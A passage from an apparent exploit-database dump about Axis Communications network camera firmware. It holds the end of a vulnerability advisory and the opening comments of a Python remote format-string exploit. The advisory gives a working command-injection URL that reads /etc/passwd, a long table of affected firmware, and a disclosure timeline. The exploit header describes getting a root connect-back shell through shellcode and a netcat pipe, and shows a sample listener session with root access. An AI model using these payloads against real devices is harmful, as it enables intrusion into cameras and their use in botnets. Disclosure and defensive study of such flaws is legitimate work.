and it's 4 attack vectors through the following pages:\r\n \r\n \r\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app=\r\n \r\n \r\nAn attacker can use the app parameter that waits for the name of a\r\nlegitimate application to inject commands in the operating system using\r\n\"%3B\", for example, to read the contents of /etc/passwd:\r\n \r\nhttp: //\r\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\r\n \r\nThe data entered in parameter \"app =\" is passed without any treatment for\r\ndevtools.sh script located at: {HTMLROOL}/bin/devtools.sh\r\n \r\nThis script contains several functions, namely:\r\n \r\nlist()\r\nstatus()\r\nmenulist()\r\nmainpagelink()\r\nSETTINGSLINK()\r\nconfvariable()\r\necho_ssivar_licensekey()\r\nload_auto_inst_form()\r\n \r\nWhen these functions are invoked, they interact with the parameters passed\r\nby the web application through\r\nthe affected scripts (e.g. ap_license.shtml? App =). By injecting the code\r\nbelow:\r\n \r\nhttp: //\r\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\r\n \r\nThe value passed in \"app\" will be passed directly to the script invoking\r\ndevtools.sh via shell -c as shown in the listing process below (third line\r\ninvoking confvariable function):\r\n \r\n[SNIP]\r\n 2039 led 25472 S /usr/bin/enldgts -n\r\n12014 root 0 SW [kworker/0:0]\r\n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh\r\nconfvariable ORW..\r\n13183 root 2728 R ps -aux PACKAGENAME\r\n13312 root 0 SW [kworker/3:1]\r\n13320 root 0 SW [kworker/2:0]\r\n[SNIP]\r\n \r\nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the\r\ncorresponding function (after passing through a conference on \"confvariable\r\n()\").\r\n \r\nconfvariable() {\r\nlocal val=\r\nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then\r\n. \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || :\r\neval val=\\$$2\r\necho $val\r\nfi\r\n}\r\n \r\n \r\nThen enter the function \"menulist ()\" which we see the main stretch located\r\nbetween the lines 127 and 143:\r\n \r\n[SNIP]\r\n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - #\r\nendif ->, null,\r\n128 [\r\n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false\r\n<! - # endif ->, null, []],\r\n130 EOF\r\n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then\r\n132 cat << - EOF\r\n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false\r\n<! - # endif ->, null, []],\r\n134 EOF\r\n135 fi\r\n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME /\r\nlicense.inc\"]; Then\r\n137 cat << - EOF\r\n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <!\r\n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else ->\r\nfalse <! - # endif ->, null, []],\r\n139 EOF\r\n140 fi\r\n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then\r\n142 cat << - EOF\r\n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - #\r\nendif ->, null, []],\r\n \r\n \r\nWhere the important lines are the menus below:\r\n \r\n \r\n/bin/devtools.sh (127):\r\n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr\r\n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null,\r\n/bin/devtools.sh (129):\r\n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif\r\n->, null, []],\r\n/bin/devtools.sh (133):\r\n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif\r\n->, null, []],\r\n/bin/devtools.sh (138):\r\n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - #\r\nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - #\r\nendif ->, null, []],\r\n/bin/devtools.sh (143):\r\n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr =\r\n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []],\r\n \r\n \r\nIn PoC presented above, the payload will be triggered in line vector 133 of\r\ndevtools script ( \"License\" menu) that will:\r\n \r\n \r\n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20\r\n/etc/passwd& \"HostA, <! - # If expr =\" \\ $ ActivePage = License \"-> true <!\r\n- # Else -> false <! - # Endif ->, null, []],\r\n \r\nAnd when executed echoes the results on the page.\r\n \r\n \r\nImpact\r\n++++++\r\nThe impact of this vulnerability is that taking into account the busybox\r\nthat runs behind (and with root privileges everywhere. in all the binaries\r\nand scripts) is possible to execute arbitrary commands, create backdoors,\r\nperforming a reverse connection to the machine attacker, use this devices\r\nas botnets and DDoS amplification methods... the limit is the creativity of\r\nthe attacker.\r\n \r\n \r\nAffected Products\r\n+++++++++++++++++\r\nMultiple Axis Communications Products/Firmware including:\r\n \r\n * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -\r\nFirmware 5.41.1.4\r\n * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -\r\nFirmware 5.70.1.2\r\n * AXIS A8004-VE Network Video Door Station -\r\nFirmware 5.85.1.1\r\n * AXIS P3384 fixed dome Network camera -\r\nFirmware 6.10.1\r\n * AXIS P5532-E PTZ Dome Network Camera -\r\nFirmware 5.41.3.1\r\n * AXIS Q60-E Network Dome PTZ -\r\nFirmware 5.65.1.1, 5.41.*, 5.70.1.1\r\n * AXIS Q7401 Video Encoder -\r\nFirmware 5.50.4\r\n * AXIS Q7404 Video Encoder -\r\nFirmware 5.50.4.*\r\n * AXIS Q7406 Blade Video Encoder -\r\nFirmware 5.51.2\r\n * AXIS Q7411 Video Encoder -\r\nFirmware 5.90.1\r\n * AXIS Q7414 Blade Video Encoder -\r\nFirmware 5.51.2\r\n * AXIS Q7424-R Video Encoder -\r\nFirmware 5.50.4\r\n * AXIS Q7424-R Mk II Video Encoder -\r\nFirmware 5.51.3\r\n * AXIS Q7436 Blade Video Encoder -\r\nFirmware 5.90.1\r\n \r\n \r\nThe list bellow shows the firmwares affected (and probably these firmwares\r\nare not available anymore, but just the last version of them, if you not\r\nsure, check the hash). All these firmwares (in the second column) has the\r\nsame \"devtools.sh\" shellscript (responsible for trigger the RCE\r\nvulnerability) embedded. The script can be found on directory:\r\n\"{HTMLROOT}/bin/devtools.sh\".\r\n \r\n========================================================================\r\nPRODUCT FIRMWARE FIRMWARE HASH\r\n========================================================================\r\nAXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a\r\nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d\r\nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10\r\nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921\r\nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7\r\nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\r\nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\r\nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e\r\nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\r\nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\r\nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a\r\nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\r\nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\r\nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\r\nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\r\nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\r\nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\r\nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65\r\nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811\r\nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e\r\nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70\r\nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7\r\nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b\r\nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6\r\nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d\r\nAXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca\r\nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509\r\nAXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\r\nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\r\nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\r\nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\r\nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\r\nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7\r\nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\r\nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979\r\nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\r\nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\r\nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939\r\nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969\r\nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb\r\nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03\r\nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad\r\nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f\r\nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d\r\nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6\r\nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af\r\nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba\r\nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c\r\nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea\r\nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474\r\nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\r\nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\r\nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\r\nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\r\nAXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56\r\nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a\r\nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532\r\nAXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532\r\nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476\r\nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864\r\nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b\r\nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e\r\nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e\r\nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2\r\nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00\r\nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d\r\nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\r\nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\r\nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892\r\nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\r\nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\r\nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc\r\nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749\r\nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271\r\nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8\r\nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727\r\nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106\r\nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0\r\nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698\r\nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611\r\nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf\r\nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52\r\nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e\r\nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313\r\nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188\r\nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\r\nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\r\nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81\r\nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863\r\nAXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9\r\nAXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409\r\nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1\r\nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83\r\nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0\r\nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd\r\nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4\r\nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49\r\nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9\r\nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1\r\nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e\r\nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688\r\nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d\r\nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660\r\nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3\r\nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de\r\nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104\r\nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506\r\nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b\r\nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47\r\nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb\r\nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026\r\nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d\r\nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53\r\nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253\r\nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766\r\nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da\r\nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501\r\nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd\r\nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1\r\nAXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d\r\nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928\r\nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d\r\nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce\r\nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6\r\nAXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea\r\nAXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8\r\nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d\r\nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741\r\nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746\r\nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b\r\nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148\r\nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5\r\nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f\r\nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5\r\nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d\r\nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0\r\nAXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e\r\nAXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd\r\nAXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4\r\nAXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7\r\nAXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee\r\nAXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd\r\nAXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd\r\nAXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51\r\nAXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77\r\nAXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699\r\nAXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4\r\n \r\n \r\nVendor Information, Solutions and Workarounds\r\n+++++++++++++++++++++++++++++++++++++++++++++\r\nAccording to the Vendor, tickets was opened to correct this issue.\r\n \r\nCredits\r\n+++++++\r\nThese vulnerabilities has been discovered and published by Orwelllabs.\r\n \r\n \r\nTimeline\r\n++++++++\r\n2015-09-10: First attempt to contact Vendor\r\n2015-10-30: Vulnerability was reported to CERT\r\n2015-11-30: CVE-IDs are assigned\r\n2016-07-25: Since the first vulnerability was published (09.04.2016 -\r\nEDB-ID: 39683)\r\na long conversation revolved around these vulnerabilities with the\r\nmanufacturer.\r\nWe maintained communication since 15/04/2016 until now.\r\nAs there is still disagreement regarding vulnerabilities (and botnets in\r\nthe wild: https://goo.gl/k79I8u),\r\nwe thought it good to publish this advisory, since it has already exhausted\r\nall deadlines.\r\n \r\n \r\nLegal Notices\r\n+++++++++++++\r\nThe information contained within this advisory is supplied \"as-is\" with no\r\nwarranties or guarantees of fitness of use or otherwise. We accept no\r\nresponsibility for any damage caused by the use or misuse of this\r\ninformation.\r\n \r\n \r\nAbout Orwelllabs\r\n++++++++++++++++\r\n# Loadind k4fK43sQu3 m0dule...\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25204"}, {"lastseen": "2018-03-17T03:12:47", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2016-07-19T00:00:00", "type": "zdt", "title": "Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-07-19T00:00:00", "id": "1337DAY-ID-25439", "href": "https://0day.today/exploit/description/25439", "sourceData": "#!/usr/bin/env python2.7\r\n# \r\n# [SOF]\r\n#\r\n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon\r\n# Research and development by bashis <mcw noemail eu> 2016\r\n#\r\n# This format string vulnerability has following characteristic:\r\n# - Heap Based (Exploiting string located on the heap)\r\n# - Blind Attack (No output the remote attacker)(*)\r\n# - Remotly exploitable (As anonymous, no credentials needed)\r\n#\r\n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.\r\n#\r\n# This exploit has following characteristic:\r\n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]\r\n# - Modifying LHOST/LPORT in shellcode on the fly\r\n# - Manual exploiting of remote targets\r\n# - Simple HTTPS support\r\n# - Basic Authorization support (not needed for this exploit)\r\n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode\r\n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)\r\n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root\r\n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)\r\n# - Multiple FMS exploit techniques\r\n# - \"One-Write-Where-And-What\" for MIPS and CRISv32\r\n# Using \"Old Style\" POP's\r\n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call\r\n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.\r\n# - \"Two-Write-Where-And-What\" for ARM\r\n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address\r\n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write\r\n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually]\r\n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)\r\n# - Exploit is quite well documented\r\n#\r\n# Anyhow,\r\n# Everything started from this simple remote request:\r\n#\r\n# ---\r\n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80\r\n# HTTP/1.1 500 Server Error\r\n# Content-Type: text/html; charset=ISO-8859-1\r\n#\r\n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>\r\n# <BODY><H1>500 Server Error</H1>\r\n# The server encountered an internal error and could not complete your request.\r\n# </BODY></HTML>\r\n# ---\r\n#\r\n# Which gave this output in /var/log/messages on the remote device:\r\n#\r\n# ---\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.\r\n# ---\r\n#\r\n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products\r\n#\r\n# ---\r\n# $ netcat -vvlp 31337\r\n# listening on [any] 31337 ...\r\n# 192.168.0.90: inverse host lookup failed: Unknown host\r\n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)\r\n# pwd\r\n# /usr/html\r\n# ---\r\n#\r\n# Some technical notes:\r\n#\r\n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect.\r\n# Old metod with POP's coming into force instantly\r\n#\r\n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)\r\n# - Would be interesting to investigate why.\r\n#\r\n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26\r\n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff\r\n#\r\n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff\r\n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f\r\n#\r\n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:\r\n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)\r\n#\r\n# 4. Everything is randomized, except heap.\r\n#\r\n# 5. My initial attempts to use ROP's was not good, as I didn't want to create\r\n# one unique FMS key by testing each single firmware version, and using ROP with FMS\r\n# on heap seems pretty complicated as there is one jump availible, maximum two.\r\n#\r\n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.\r\n# \r\n# 6. Encoded and Decoded shellcode located in .bss section.\r\n# 6.1 FMS excecuted on heap\r\n#\r\n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM\r\n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,\r\n# so execute shellcode on heap/stack may be impossible.\r\n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,\r\n# and re-compile of the image.\r\n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.\r\n#\r\n# 8. This exploit are pretty well documented, more details can be extracted by reading\r\n# the code and comments.\r\n#\r\n# MIPS ssid maps\r\n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid\r\n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid\r\n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]\r\n#\r\n# ARM ssid maps\r\n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid\r\n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid\r\n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]\r\n#\r\n# Crisv32 ssid maps\r\n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid\r\n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid\r\n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]\r\n#\r\n# General notes:\r\n#\r\n# When the vul daemon process is exploited, and after popping root connect-back shell,\r\n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,\r\n# when the main process are fully alive again, I can enjoy the shell, and everybody else can\r\n# enjoy of the camera - that should make all of us happy ;)\r\n# During exploiting, logs says almost nothing, only that the main process restarted.\r\n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)\r\n#\r\n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),\r\n# after ssid cannot verify the user, free() are the closest function to be called after\r\n# vsyslog(), needed and perfect to use for jumping.\r\n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.\r\n# So we are 